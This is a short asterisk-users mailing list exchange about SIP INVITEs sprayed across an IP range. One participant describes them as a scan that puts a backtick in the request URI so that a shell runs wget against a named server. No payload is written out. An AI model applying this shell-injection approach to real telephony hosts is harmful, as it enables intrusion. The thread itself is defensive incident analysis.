On 09/11/2011 07:35 PM, Tom Browning wrote:
I disagree with the 'review CDR' angle for a number of reasons:
a) there is a backtick in the URI trying to force shell and the proper
wget command line to send results to /dev/null
b) the V.php (at the url) appears to do nothing at all and might just
be empty (for log scraping), url safety checks confirm
c) the invites were sprayed across my entire IP address range
To me, this is more like a scan for any SIP host that has shell
injection vulerability. The list of vulnerable hosts is just a log
scrape away at the server 91.223.89.94
On second thought, your interpretation does make much more sense. :-)
--
Alex Balashov - Principal
Evariste Systems LLC
260 Peachtree Street NW
Suite 2200
Atlanta, GA 30303
Tel: +1-678-954-0670
Fax: +1-404-961-1892
Web: http://www.evaristesys.com/
--
_____________________________________________________________________
-- Bandwidth and Colocation Provided by http://www.api-digital.com --
New to Asterisk? Join us for a live introductory webinar every Thurs:
http://www.asterisk.org/hello
asterisk-users mailing list
To UNSUBSCRIBE or update options visit:
http://lists.digium.com/mailman/listinfo/asterisk-users
